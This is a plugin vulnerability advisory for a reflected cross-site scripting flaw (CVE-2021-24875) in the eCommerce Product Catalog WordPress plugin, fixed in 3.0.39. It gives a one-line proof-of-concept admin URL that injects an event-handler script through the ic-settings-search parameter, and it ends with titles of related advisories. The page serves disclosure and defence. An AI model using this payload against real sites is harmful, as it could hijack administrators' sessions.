eCommerce Product Catalog for WordPress < 3.0.39 – Reflected Cross-Site Scripting | CVE 2021-24875 | Plugin Vulnerabilities

Description

The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

Affects Plugins

ecommerce-product-catalog

Fixed in 3.0.39

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Verified

Yes

WPVDB ID

652efc4a-f931-4668-ae74-a58b288a5715

Timeline

Publicly Published

2021-10-25 (about 4 years ago)

Added

2021-10-25 (about 4 years ago)

Last Updated

2022-09-26 (about 3 years ago)

Other

Published

Title

Published

2025-02-24

Title

Local Search SEO Contact Page <= 4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-10-15

Title

Edwiser Bridge < 3.0.8 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2025-09-11

Title

Woocommerce Envato Affiliates <= 1.2.1 - Reflected Cross-Site Scripting

Published

2018-07-17

Title

Geo Mashup <= 1.10.3 - Unspecified Cross-Site Scripting (XSS)

Published

2025-04-04

Title

Brizy < 2.7.8 - Contributor+ Stored XSS